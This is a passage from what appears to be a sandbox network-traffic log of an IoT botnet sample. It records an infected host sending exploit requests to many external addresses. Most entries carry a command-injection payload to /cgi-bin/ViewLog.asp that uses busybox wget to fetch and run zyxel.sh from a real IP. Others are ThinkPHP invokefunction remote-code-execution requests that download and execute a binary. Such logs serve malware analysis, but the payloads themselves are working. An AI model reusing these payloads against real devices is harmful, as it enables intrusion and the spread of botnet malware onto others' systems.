                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:18.963663101 CET313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        197192.168.2.145761894.120.39.2278080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:18.726358891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        198192.168.2.1437314112.124.183.7280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:19.622889042 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:21.384397030 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:21.708359957 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:34 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        199192.168.2.144599431.136.238.258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:20.185249090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:20.808470964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:22.056566000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.712364912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:29.832091093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.815644979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:00.294975042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:41.253216028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        200192.168.2.145200631.136.76.1878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:20.185592890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:20.808479071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:22.056577921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.712367058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:29.832101107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.815630913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:00.294904947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:41.253221035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        201192.168.2.145109831.136.162.1428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:20.205367088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:20.904382944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:22.280484915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:25.224252939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:30.856168032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:41.863558054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:04.390721083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:49.444781065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        202192.168.2.145112494.121.131.908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:20.233731985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        203192.168.2.144656294.159.13.548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:20.455985069 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:20.679286003 CET337INHTTP/1.1 405 Not Allowed
                                                        Server: Web server
                                                        Date: Wed, 14 Feb 2024 08:33:07 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 155
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        204192.168.2.143713094.120.157.1628080
                                                        TimestampBytes transferredDirectionData
